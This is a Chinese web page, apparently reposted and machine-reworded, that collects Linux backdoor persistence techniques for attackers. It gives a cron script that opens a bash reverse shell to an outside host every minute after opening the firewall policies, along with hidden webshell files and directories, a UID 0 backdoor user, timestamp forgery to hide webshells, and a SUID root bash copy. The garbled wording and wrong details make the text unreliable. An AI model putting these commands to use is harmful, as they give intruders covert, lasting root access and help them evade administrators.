Linux后门整理合集
"Unix Bash 远程控制侧门
介绍
运用 Unix/Linux 内置的 Bash 和 Crond 建立远程控制作用,维持反跳发布到内网ip设备。
运用方式
先建立 /etc/xxxx 脚本制作文档(姓名自个改),运用该脚本制作开展反跳。下列脚本制作意味着自动式反跳到 8.8.8.8 的 52 端口号。
nano /etc/xxxx
#!/bin/bash
if netstat -ano|grep -v grep | grep ""8.8.8.8"">/dev/null
then
echo ""Ok"">/dev/null
else
/sbin/iptables --policy INPUT ACCEPT
/sbin/iptables --policy OUTPUT ACCEPT
bash -i >& /dev/tcp/8.8.8.8/52 0>&1
fi
chmod +sx /etc/xxxx
随后人们必须改动一下下 /etc/crontab 让它定时重启。
nano /etc/crontab 在 /etc/crontab 文档末添加这每行。意味着每 1 分鐘实行多次。
*/1 * * * * root /etc/xxxx
最终重新启动一下下 crond 的服务项目。(不一样发行版重新启动方法不同,自主查寻)
service cron reload
service cron start
随后在 8.8.8.8 的网络服务器上应用 NC 接受 Shell 只能。
nc -vv -Lp 52
Linux/Unix 藏文档和文件夹名称
Linux/Unix 下想藏 Webshell 或是侧门哪些的,能够运用一下下隐藏文件夹和文档。
方式一
例如建立1个姓名打头带 . 的 Webshell 或是文件夹名称,默认设置状况下是不容易显示信息出去的,电脑浏览器浏览的那时候天赋加点浏览就行。(查询方式:ls -a)
touch .webshell.Python 建立姓名为 .webshell.Python 的文档
mkdir .backdoor/ 建立姓名为 .backdoor 的文件夹名称
最终方式
在管理人员喝醉了或是头脑转不回来的状况下,是絕對不容易发觉的!最少我用了这么多年是没好多个发觉的。
是文档得话电脑浏览器浏览立即输 有限责任公司 就行,文件目录同理。
touch 有限责任公司 建立姓名为 有限责任公司 的文档
mkdir 有限责任公司 建立姓名为 有限责任公司 的文件夹名称
实际效果如图所示:
文中《Linux侧门梳理合辑(脉率强烈推荐)》由armyzer0精英团队原創网上投稿安全性脉率,创作者老师机,安全性脉率SecPulse.Com独家代理发布文中,如必须转截,请先联络安全性脉率受权;没经受权切勿转截。
Linux/Unix 加上 UID 为 0 的客户
介绍
在 Unix 管理体系下,UID 为 0 就是说 root 管理权限。因此渗入的那时候能够加上1个 UID 为 0 的客户做为侧门。
运用方式
useradd -o -u 0 backdoor
Linux/Unix 改动文档时间戳
介绍
Unix 下藏侧门必需要改动時间,不然非常容易被发觉,立即运用 touch 就就行了。
例如参照 index.Python 的時间,再赋给 webshell.Python,結果2个文档的時间就相同了。
运用方式
touch -r index.Python webshell.Python
或是立即将时间戳改动成某年某月某日。给出 2012 年 08 月 81 日。
touch -t 1401021042.30 webshell.Python
系统软件自然环境:
dawg:~# uname -a
Linux dawg 2.4.20-1-386 #3 Sat Mar 26 13:12:50 EST 2007 i686 GNU/Linux
SUID shell
运用方式
最先, 先转换变成root客户,并实行下列的指令:
dawg:~# Cp /bin/bash /.woot
dawg:~# chmod 4755 /.woot
dawg:~# ls -aL /.woot
-rwsr-xr-x 1 root root 690668 Jul 28 18:13 /.woot
或许, 你还可以起别的更具有掩藏性的姓名,我想要猥亵并随机应变的你,确实能想了许多好听的名字的。
文档前边的那一点儿也
相关文章
- 3条评论
- 似暖i2022-05-29 13:25:34
- p; 最先, 先转换变成root客户,并实行下列的指令:dawg:~# Cp /bin/bash /.wootdawg:~# chmod 4755 /.wootdawg:~# ls -aL /.woot-rwsr-xr-x 1 root root 690668 Jul 28 18:13
- 语酌空名2022-05-29 15:48:55
- nux/Unix 改动文档时间戳 介绍 Unix 下藏侧门必需要改动時间,不然非常容易被发觉,立即运用 touch 就就行了。例如参照 index.Python 的時间,再赋给 webshell.Python,結果2个
- 俗野掩灼2022-05-29 16:16:36
- 下是不容易显示信息出去的,电脑浏览器浏览的那时候天赋加点浏览就行。(查询方式:ls -a)touch .webshell.Python 建立姓名为 .webshell.Python 的文档mkdir .backdoor/